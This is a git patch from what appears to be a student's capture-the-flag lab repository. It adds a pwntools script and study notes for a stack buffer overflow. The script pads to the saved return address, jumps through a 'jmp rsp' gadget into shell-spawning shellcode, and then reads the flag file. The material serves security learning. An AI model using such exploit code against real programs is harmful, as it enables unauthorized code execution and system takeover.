From 214eac87192355c97a2c5941f44310f198e14907 Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Tue, 29 Oct 2024 14:55:46 -0700 Subject: [PATCH] lab 4b.3 - some more shellcode --- 4b/lab4b_3.py | 64 +++++++++++++++++++++++++++++++++++++++++++++++++++ Dojo Notes.md | 14 ++++++++++- 2 files changed, 77 insertions(+), 1 deletion(-) create mode 100644 4b/lab4b_3.py diff --git a/4b/lab4b_3.py b/4b/lab4b_3.py new file mode 100644 index 0000000..d57ff44 --- /dev/null +++ b/4b/lab4b_3.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# This exploit template was generated via: +# $ pwn template /challenge/run +from pwn import * + +# Set up pwntools for the correct architecture +exe = context.binary = ELF(args.EXE or "/challenge/run") + +# Many built-in settings can be controlled on the command-line and show up +# in "args". For example, to dump all data sent/received, and disable ASLR +# for all created processes... +# ./exploit.py DEBUG NOASLR + + +def start(argv=[], *a, **kw): + """Start the exploit against the target.""" + if args.GDB: + return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) + else: + return process([exe.path] + argv, *a, **kw) + + +# Specify your GDB script here for debugging +# GDB will be launched if the exploit is run via e.g. +# ./exploit.py GDB +gdbscript = """ +b vuln +continue +""".format( + **locals() +) + +# =========================================================== +# EXPLOIT GOES HERE +# =========================================================== +# Arch: amd64-64-little +# RELRO: No RELRO +# Stack: No canary found +# NX: NX unknown - GNU_STACK missing +# PIE: No PIE (0x400000) +# Stack: Executable +# RWX: Has RWX segments + +io = start() + +target_fn = 0x401146 + +unbound_buffer = 0x7FFDE3E76C00 +saved_rip = 0x7FFDE3E76C48 +offset = saved_rip - unbound_buffer + +payload_padding = b"F" * offset # pad until saved_rip +payload_rip = p64(target_fn) # in this challenge, we target the jmp rsp code +payload_shellcode = asm(shellcraft.sh()) # from pwn +payload = payload_padding + payload_rip + payload_shellcode + b"\n" + +io.send(payload) +print("[>>>] Sending payload...") + +# root shell gained +io.send(b"cat /flag \n") + +io.interactive() diff --git a/Dojo Notes.md b/Dojo Notes.md index 952de77..97117c5 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -453,7 +453,7 @@ done ### .26 - arg wars V - the system strikes back -- pipe symbol now added to filter +- pipe symbol now added to filter - luckily we didn't use that ### .27 - overflow gods @@ -479,3 +479,15 @@ done - even more direct access - no addition of address, just direct address control (lol) - set flag to `0xdeadfeed` + +### lab 4b.3 - overflow + a defense + +- similar to 4b.1 and 4b.2 +- but here we dont have RSP so we cant point RIP to it +- instead there's a function that has `jmp *%rsp` +- so first, pad the vulnerable stack buffer upto the saved RIP's address +- put that function's address in it +- now, remember that when a function returns, it pops its stack +- so we need to put our shellcode after this saved RIP's location +- that way, when the current function returns into the target function, the target function's RSP will point to the shellcode +- boom